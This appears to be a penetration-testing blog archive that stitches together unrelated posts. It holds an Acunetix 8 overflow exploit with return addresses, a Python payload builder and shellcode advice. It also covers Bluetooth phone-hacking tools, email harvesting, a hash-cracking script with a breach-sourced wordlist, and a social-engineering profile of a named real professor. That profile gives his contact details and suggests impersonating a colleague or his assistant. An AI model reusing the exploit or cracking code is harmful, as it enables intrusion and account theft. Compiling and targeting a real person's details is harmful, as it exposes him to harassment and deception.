Category Archives: Penetration Testing

That article revealed a new vulnerability that gave attackers the ability to perform a spoofing attack.

Many people wrote to me about the problems with that kind of article (for example).

So this time I'm going to reveal a new 0-day that will help security managers protect their web sites against many vulnerability scans.

A lot of site owners will tell you that the majority of scans performed against their sites come from automated tools like Nessus, Acunetix and AppScan.

Today's 0-day focuses on one of the most popular web scanners in the world, Acunetix.

The PoC is against Acunetix 8 (build 20120704, since it is one of the most common cracked versions published on the net and used by many newbie hackers).

This disclosure will not only reveal a new vulnerability, but also demonstrate a whole new way of dealing with external attacks.

Instead of protecting your web sites again and again, or buying a new advanced WAF (web application firewall), let's give the attackers a reason to be afraid, a reason to think twice before they press the "SCAN" button.

In this article I will not give a full working exploit for all scan scenarios or all operating systems, but a proof of concept that will hopefully grow into a new research effort into vulnerabilities in penetration-testing tools.

So let's get our hands dirty.

Acunetix is a powerful tool for scanning websites and finding vulnerabilities.

Many newbie attackers tend to use this tool because it is so simple to use.

Acunetix offers its users a simple wizard-based scan that covers many aspects of a vulnerability scan.

One of these aspects is the ability to scan additional domains or subdomains related to the scanned website.
For example, if we scan my blog "http://an7isec.blogspot.co.il", we get the result shown below:
After a little research into this option, I found that Acunetix starts its wizard by sending an HTTP request to the site and learning about it from the HTTP response.

Furthermore, the wizard learns about related external domains from the external resources that appear on the website, for example:

“<img src=http://externalSource.com/someimg.png >”

“<a href=http://externalSource.com/ ></a>”

Etc…

Further analysis reveals that if one of the external domain names is longer than 268 bytes, Acunetix crashes. So, to cause a crash, all we need to do is place an external resource on our site whose domain name is 268 bytes or longer, something like this:
<A href="http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">

A quick look at the application in Immunity Debugger reveals that EDX was corrupted by the fuzzing string, which caused an access violation:

Despite the fact that the overflow also runs over the Structured Exception Handler (SEH), as you will probably notice, my advice is not to go that way; believe me, I tried it for several days with no success (because of the SafeSEH mechanism).

However, we have another problem with this exploit. In one word: "ASCII".

Acunetix gets its information about external domains as a URL.

This causes the string to be converted into a web-browser-friendly string, so every byte of the payload, return addresses included, must be a character that survives URL handling.

500f = 0x66303035: a readable memory address that repairs the application's flow, which the overflow corrupted, so execution carries on to our return address.

]Qy~ = 0x7e79515d (a JMP ESP in SXS.DLL).

Both values were chosen because each of their four bytes, written in little-endian order (35 30 30 66 and 5d 51 79 7e), is a printable character that survives in a URL; that is the "ASCII" constraint above.

OK, we are now at the semifinal stage. Running the application against the above payload produced the following result:

Yes… we landed exactly at the beginning of the final payload.

The next step is to use a suitable Windows shellcode made only of characters that are valid in a URL string (limited ASCII).

Such shellcode can be generated with Metasploit; it is called "alphanumeric shellcode".

The important thing to remember when using such a payload is that the payload's start address must be present in one of the registers. If the payload sits at ESP, the first opcode of the shellcode needs to be "PUSH ESP".

In my proof of concept I used a simple "CALC.EXE" shellcode generated by Metasploit, which led me to the final stage: a working exploit!

Moreover, DEP does not stop this exploit. On Windows XP the default DEP policy is OptIn, so only Windows system binaries and programs that explicitly opt in are protected, and since Acunetix itself does not opt in, its stack stays executable. Windows XP also has no ASLR, so the SXS.DLL address above stays fixed, and the exploit should work reliably on Windows XP.
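The payload construction described above, as an added example for this page rather than the author's exploit: it packs the two addresses the article names (0x66303035 and 0x7e79515d) into their little-endian byte form, checks that every byte of the hostname survives URL handling, and assembles the `<a href>` tag. The 268-byte crash length and the addresses come from the article; the padding layout, the character whitelist, and the shellcode stand-in are assumptions for illustration, not measured values.

```python
"""Build the long-hostname payload described above and check that every byte of
it survives being handled as a URL. This is an added example for this page, not
the author's exploit: the 268-byte crash length and the two addresses
(0x66303035 and 0x7e79515d) come from the article; the padding layout, the
character whitelist and the shellcode stand-in are assumptions for illustration."""
import string
import struct
from typing import List, Tuple

# Assumption: these bytes pass through URL handling untouched (RFC 3986 unreserved
# characters plus a few sub-delims). Anything else risks being percent-encoded,
# stripped or rejected before it reaches the vulnerable buffer.
URL_SAFE = frozenset((string.ascii_letters + string.digits + "-._~!$*+,;=[]").encode())

CRASH_LENGTH = 268       # article: external hostnames this long crash the scanner
FIX_ADDR = 0x66303035    # "500f": readable address that repairs the corrupted pointer
JMP_ESP = 0x7e79515d     # "]Qy~": JMP ESP gadget in SXS.DLL

# Stand-in for Metasploit alphanumeric shellcode (NOT real shellcode): it only
# shows the constraint that the first byte is PUSH ESP (0x54 == "T") and that the
# rest must stay inside the printable set.
SHELLCODE_STANDIN = b"T" + b"A" * 64


def pack_addr(addr: int) -> bytes:
    """32-bit address in little-endian order, i.e. the bytes as they must appear
    in the string. Only addresses whose four bytes are all URL-safe are usable."""
    return struct.pack("<I", addr)


def unsafe_bytes(payload: bytes) -> List[Tuple[int, int]]:
    """(offset, value) of every byte that would not survive URL handling."""
    return [(i, b) for i, b in enumerate(payload) if b not in URL_SAFE]


def addr_is_usable(addr: int) -> bool:
    """The test applied when picking FIX_ADDR and JMP_ESP."""
    return not unsafe_bytes(pack_addr(addr))


def build_hostname(pad_len: int = CRASH_LENGTH, shellcode: bytes = SHELLCODE_STANDIN) -> bytes:
    """Assumed layout: filler up to the overwritten pointer, the repair address,
    the return address (JMP ESP), then the shellcode that ESP points at.
    Raises if any byte would be mangled on its way through the URL."""
    host = b"A" * pad_len + pack_addr(FIX_ADDR) + pack_addr(JMP_ESP) + shellcode
    bad = unsafe_bytes(host)
    if bad:
        raise ValueError(f"{len(bad)} byte(s) not URL-safe, first at offset {bad[0][0]}: {bad[0][1]:#04x}")
    return host


def build_html(hostname: bytes) -> str:
    """The external-resource tag the scanner's wizard parses to learn related domains."""
    return f'<a href="http://{hostname.decode("ascii")}/">link</a>'


if __name__ == "__main__":
    page = build_html(build_hostname())
    print(len(page), "bytes:", page[:60] + "...")
```

Running `addr_is_usable` over candidate gadgets is the quickest way to see why so few JMP ESP addresses qualify: any byte below 0x21, above 0x7e, or in the reserved set is rejected, which is exactly the filter the article's two addresses pass.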

After successfully reaching all our goals, let's look at the final working exploit:

Following all the above, we have created a powerful exploit that newbie hackers will definitely fall for.

This exploit gives us the ability to do anything we want with those nasty newbie hackers who scan our sites day and night, killing our traffic, filling all the web site forms with junk and so on…

Furthermore, it can be used to collect intelligence about hostile parties who want to attack our web application.

BUT!!

The more powerful idea that motivated me to reveal this concept and PoC is the fact that this exploit is an anonymity killer: even if the attacker uses the smartest and most secure proxy in the world, such as Tor and others, his identity will be revealed and full control of his scanning machine will be gained.
The exploit can be downloaded from here.

A very good and important point, right? If you are a software tester or a QA engineer, then you must be thinking every minute about how to find a bug in the application. And you should be!

Is finding a blocker bug, like a system crash, the most rewarding find? I don't think so. You should try to find the bugs that are the most difficult to find and that always mislead users.

Finding such subtle bugs is the most challenging work, and it gives you satisfaction in your work. It should also be rewarded by seniors. I will share my experience with one such subtle bug that was not only difficult to catch but also difficult to reproduce.
I was testing one module of my search-engine project. I do most of the testing on this project manually, as it is a bit complex to automate. That module consisted of traffic and revenue stats for different affiliates and advertisers, so testing such reports is always a difficult task. When I tested this report it showed accurately processed data for some time, but when I tried to test it again later it showed misleading results. It was strange and confusing to see those results.

There was a cron job (cron runs a script automatically at a specified time or on a specified condition) that processed the log files and updated the database. Several such cron jobs were running on the log files and the DB to synchronize the totals. Two of them ran on the same table at different intervals, and a column in that table was being overwritten by the other cron, producing inconsistent data: a classic race between two writers. It took us a long time to figure out the problem because of the vast number of DB processes and different crons.

My point is: try to find the hidden bugs in the system that occur only under special conditions and have a strong impact on the system. You can find such bugs with some tips and tricks.

So what are those tips?

1) Understand the whole application or module in depth before starting the testing.

2) Prepare good test cases before you start testing. I mean, put stress on the functional test cases that cover the major risks of the application.

3) Create sufficient test data before the tests; this data set includes the test-case conditions and also the database records if you are going to test a DB-related application.

4) Perform repeated tests in different test environments.

5) Try to find the result pattern and then compare your results with those patterns.

6) When you think you have covered most of the test conditions and are somewhat tired, do some monkey testing.

7) Use your previous test-data patterns to analyse the current set of tests.

8) Try some standard test cases for which you found bugs in a different application. For example, if you are testing an input text box, try inserting some HTML tags as input and see the output on the display page (this is the same probe that finds cross-site scripting).

9) Last and the best trick: try very hard to find the bug, as if you are testing only to break the application!

You must have seen in movies a HACKER accessing mobile phones to steal their important data. Bluetooth hacking is one of the popular ways to hack, or steal data from, a phone.

There are lots of tools and software available on the internet that can be used to hack a phone.

One of the most popular ways to transfer data between two mobile devices in range is via Bluetooth. But Bluetooth, just like any other wireless network, is prone to attackers. Bluetooth attacks can be classified as follows.

BlueJacking: sending unsolicited messages (typically a vCard over OBEX) to a discoverable device; a nuisance, no data is taken.

BlueSnarfing: unauthorized access to data on the device (contacts, calendar, messages) over an OBEX connection without the owner's consent.

BlueBugging: taking control of the phone (AT commands over a serial channel) to place calls, send SMS or eavesdrop.

In this post I have outlined only some Bluetooth hacking software.

1. BlueScanner:

The first thing one needs in Bluetooth hacking is to identify all the devices that have their Bluetooth turned on. BlueScanner is a tool for Windows which helps in discovering Bluetooth devices and tries to get all the information about each newly discovered device.

2. Super Bluetooth Hack

This is one of the best-known tools and is used to read information from, and control, another phone remotely via Bluetooth. The phone's call list and SMS can be stored as HTML. In addition, it can also show information about the battery, SIM network and much more. Note that it works over a Bluetooth connection the other phone has to accept (pairing), so it is not a silent remote exploit.

If you want to download the software (Super Bluetooth Hack), simply download it and use it. It is quite easy to use. Follow these steps to install SBH (Super Bluetooth Hack) directly on your phone:

1. Go to m.brothersoft.com.

2. Find the Quick Download Page link at the bottom of the page.

3. Enter this code: 127249

4. Your download will start automatically.

3. BTBrowser

This is a J2ME mobile application which offers functionality similar to BlueScanner. With this tool you can browse and explore files. This application works on phones which support JSR-82 (the Java Bluetooth API), such as the Nokia 6600 and Sony Ericsson P900. Download

4. BTCrawler

BTCrawler is a device scanner for Windows Mobile based phones. It can also perform other Bluetooth attacks, namely bluesnarfing and bluejacking, against vulnerable Bluetooth devices in range.

The information-gathering steps of footprinting and scanning are the most important ones before hacking. Good information gathering can make the difference between a successful penetration test and one that fails to provide maximum benefit to the client.

We can say that information is a weapon: a successful penetration test, like a real attack, needs a lot of relevant information, which is why information gathering, also called footprinting, is the first step of hacking. So gathering valid login names and email addresses is one of the most important parts of a penetration test.

theHarvester was developed in Python by Christian Martorella. It is a tool which gathers e-mail accounts, user names and hostnames/subdomains from public sources like search engines and PGP key servers.

This tool is designed to help the penetration tester in the early stage of an engagement; it is effective, simple and easy to use. The sources supported are:

Google – emails, subdomains/hostnames

Google profiles – employee names

Bing search – emails, subdomains/hostnames, virtual hosts

PGP servers – emails, subdomains/hostnames

LinkedIn – employee names

Exalead – emails, subdomains/hostnames

New features:

Time delays between requests

XML results export

Search a domain in all sources

Virtual host verifier

Getting Started:

If you are using Kali Linux, open a terminal and run the command theharvester.
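The core of what theHarvester does per source, as an added example for this page (not theHarvester's own code): pull e-mail addresses and hostnames out of raw search-result text and keep only those that actually belong to the target domain. The search-result snippet below is constructed and `example.org` stands in for the target; a real run would fetch the text from the search engines and PGP servers listed above.

```python
"""Pull e-mail addresses and hostnames that belong to one target domain out of
raw search-result text, which is the core of what theHarvester does per source.
Added example for this page, not theHarvester's own code: the snippet below is
a constructed search-result page and example.org stands in for the target."""
import re
from typing import List, Set, Tuple

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# A hostname must not be glued to a preceding name character, so that
# "www.example.org.evil.com" is captured whole rather than as a shorter suffix.
HOST_RE = re.compile(r"(?<![A-Za-z0-9.-])((?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,})")


def in_scope(host: str, domain: str) -> bool:
    """True only for the domain itself or a real subdomain, so look-alikes such as
    notexample.org or example.org.evil.com are rejected."""
    return host == domain or host.endswith("." + domain)


def harvest(text: str, domain: str) -> Tuple[Set[str], Set[str]]:
    """Return (emails, hostnames) found in text that belong to domain."""
    domain = domain.lower()
    emails: Set[str] = set()
    hosts: Set[str] = set()
    for m in EMAIL_RE.finditer(text):
        addr = m.group(0).lower()
        if in_scope(addr.split("@", 1)[1], domain):
            emails.add(addr)
    for m in HOST_RE.finditer(text):
        host = m.group(1).lower().rstrip(".")
        if in_scope(host, domain):
            hosts.add(host)
    return emails, hosts


def harvest_sorted(text: str, domain: str) -> Tuple[List[str], List[str]]:
    """Deterministic output for reports and tests."""
    emails, hosts = harvest(text, domain)
    return sorted(emails), sorted(hosts)


# Constructed sample of what a search-engine result page might contain.
SAMPLE_RESULTS = """
<a href="https://www.example.org/contact">Contact us</a> or mailto:press@example.org
Jane Doe &lt;jane.doe@Mail.Example.ORG&gt; spoke at https://vpn.example.org/login
Phishing kit seen at www.example.org.evil.com (admin@example.org.evil.com)
PGP key 0x1234 for "Bob" <bob@notexample.org>
"""


if __name__ == "__main__":
    found_emails, found_hosts = harvest_sorted(SAMPLE_RESULTS, "example.org")
    print("emails:", found_emails)
    print("hosts: ", found_hosts)
```

The scope check matters more than the regexes: search results for a domain are full of look-alike names, and a harvester that keeps `example.org.evil.com` as a subdomain will send the rest of the engagement after the wrong infrastructure.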

The list contains every wordlist, dictionary, and password database leak that the creator could find on the internet (and he spent a LOT of time looking). It also contains every word in the Wikipedia databases (pages-articles, retrieved 2010, all languages) as well as lots of books from Project Gutenberg. It also includes the passwords from some low-profile database breaches that were being sold in the underground years ago.

The format of the list is a standard text file sorted in case-insensitive alphabetical order. Lines are separated with a newline "\n" character.

You can test the list without downloading it by giving SHA256 hashes to the free hash cracker or to @PlzCrack on Twitter. Here's a tool for computing hashes easily. Here are the results of cracking LinkedIn's and eHarmony's password hash leaks with the list.

The list is responsible for cracking about 30% of all hashes given to CrackStation’s free hash cracker, but that figure should be taken with a grain of salt because some people try hashes of really weak passwords just to test the service, and others try to crack their hashes with other online hash crackers before finding CrackStation. Using the list, we were able to crack 49.98% of one customer’s set of 373,000 human password hashes to motivate their move to a better salting scheme.
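How a wordlist in this format is used against a dump of unsalted hashes, and why the customer's move to per-user salting matters, as an added example for this page (not CrackStation's code): the six-entry wordlist and the "leaked" hashes are constructed, and `example` values such as the salt are arbitrary.

```python
"""Crack unsalted SHA-256 hashes against a wordlist in the format described
above (one candidate per line, newline-separated, sorted case-insensitively),
then show why a per-user salt defeats the same precomputed lookup. Added
example for this page, not CrackStation's code; the wordlist and the 'leaked'
hashes are constructed."""
import hashlib
from typing import Dict, Iterable, List, Optional

# Constructed six-entry wordlist in the list's format: "\n" line endings,
# case-insensitive alphabetical order.
WORDLIST_TEXT = "123456\nDragon\nletmein\npassword\nPassword1\nqwerty\n"


def sha256_hex(data: str) -> str:
    return hashlib.sha256(data.encode("utf-8")).hexdigest()


def load_wordlist(text: str) -> List[str]:
    return [line for line in text.split("\n") if line]


def is_sorted_case_insensitive(words: List[str]) -> bool:
    """Format check: the list is ordered without regard to case."""
    return all(a.lower() <= b.lower() for a, b in zip(words, words[1:]))


def build_lookup(words: Iterable[str]) -> Dict[str, str]:
    """hash -> candidate, computed once. Reusing this table across every hash in a
    dump is what makes unsalted hashes so cheap to crack."""
    return {sha256_hex(w): w for w in words}


def crack_unsalted(hashes: Iterable[str], lookup: Dict[str, str]) -> Dict[str, Optional[str]]:
    return {h: lookup.get(h.lower()) for h in hashes}


def crack_rate(results: Dict[str, Optional[str]]) -> float:
    return sum(v is not None for v in results.values()) / len(results)


def salted_sha256_hex(password: str, salt: bytes) -> str:
    return hashlib.sha256(salt + password.encode("utf-8")).hexdigest()


def crack_salted(hash_hex: str, salt: bytes, words: Iterable[str]) -> Optional[str]:
    """With a unique salt the shared table is useless; every candidate has to be
    re-hashed for this one account."""
    for w in words:
        if salted_sha256_hex(w, salt) == hash_hex:
            return w
    return None


if __name__ == "__main__":
    words = load_wordlist(WORDLIST_TEXT)
    table = build_lookup(words)
    dump = [sha256_hex("letmein"), sha256_hex("Password1"), sha256_hex("correct horse battery")]
    hits = crack_unsalted(dump, table)
    print(f"unsalted: cracked {crack_rate(hits):.0%}")
    salt = bytes.fromhex("a1b2c3d4e5f60718")  # constructed per-user salt
    print("salted hash found in table:", table.get(salted_sha256_hex("password", salt)))
    print("salted brute force:", crack_salted(salted_sha256_hex("password", salt), salt, words))
```

Salting only removes the table reuse; a salted SHA-256 is still fast enough that each account can be brute-forced with the same wordlist, as `crack_salted` shows. The fix a practitioner should actually push for is a deliberately slow password hash (bcrypt, scrypt, Argon2 or PBKDF2 with a high iteration count) on top of the per-user salt.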

The key to a successful social engineering engagement is trust. If you can win someone's trust easily, you can obtain any information you want. People are also suspicious when they don't know someone, and they are not so open when you ask them for something about themselves or their company. However, if you have done your research and give them information that has valid grounds, you may be able to convince them and win their trust faster. In this article we will see how we can create a profile of someone we don't know.

Let's say that our client is MIT (Massachusetts Institute of Technology) and we don't have any information about them. The first step is to discover email addresses and profiles that exist on social media networks. We have two options in this step: we can use either the tool theHarvester or the Metasploit module called search_email_collector.

Using the email collector module of the Metasploit framework is pretty simple. We just need to set the domain of our target and it will automatically search through Bing, Yahoo and Google for valid email addresses.

Our target in this case is MIT, so the domain that we want to set is mit.edu. Below is a sample of our results.

On the other hand, theHarvester gives us more options. Apart from scanning for email addresses, we can also scan for profiles on social media like Google+ and LinkedIn. In the next image you can see the command that we executed in the tool.

Below is a sample of the email addresses that theHarvester discovered. Of course we can combine the results with those of the Metasploit module if we wish.

We can also try to scan for profiles related to mit.edu on professional social networks like LinkedIn. We discovered 2 profiles.

So we have a lot of email addresses and two names. Comparing the results with the Metasploit email collector module, we identified an email address that probably corresponds to the Walter Lewin profile. The email address is lewin@mit.edu and you can see it in the results below.

Now that we have a name and an email address it is much easier to search the web to collect as much information as possible about this particular person. For example, we can start by checking his LinkedIn profile.

We can use the email address lewin@mit.edu to discover his Facebook profile.

The information we can retrieve without being Facebook friends with him is limited. However, if we impersonate a teacher at MIT we can send a friend request, and we might convince him this way to add us to his friend list so we can access much more personal information. Another good tool for obtaining information is the website pipl.com.

As you can see, we have discovered information about his age, his job, his personal web space, his Amazon wish list and a website that contains the profile of this professor. From the same search we also managed to find his work phone number and his office room.

We can verify the above details simply by finding his personal web page at MIT.

From the above image, besides the phone numbers and the addresses, we have also discovered this professor's assistant. This can help us in many ways, for example by sending him an email pretending that it comes from his assistant. The professor will think it came from a person he trusts, so he will respond to our questions more easily.

Basically, the idea when constructing a profile of the person on whom you will use your social engineering skills is to have as much information as possible about his interests and activities, his friends and colleagues, emails and phone numbers, etc. Keeping all that information in your notebook will help you construct an ideal scenario that will work.

Conclusion

Exposure of personal information is an advantage for every social engineer. Everything you post on the Internet will eventually stay there forever. So before you post something personal, think twice about whether it is really necessary to let other people know about yourself and your activities. Also, using different email addresses and usernames will make the work of social engineers much more difficult.

Disclaimer

Pentestlab highly appreciates Professor Walter Lewin and respects his work and contribution to science, and does not in any way encourage its readers to use this personal information to perform illegal activities against this person.
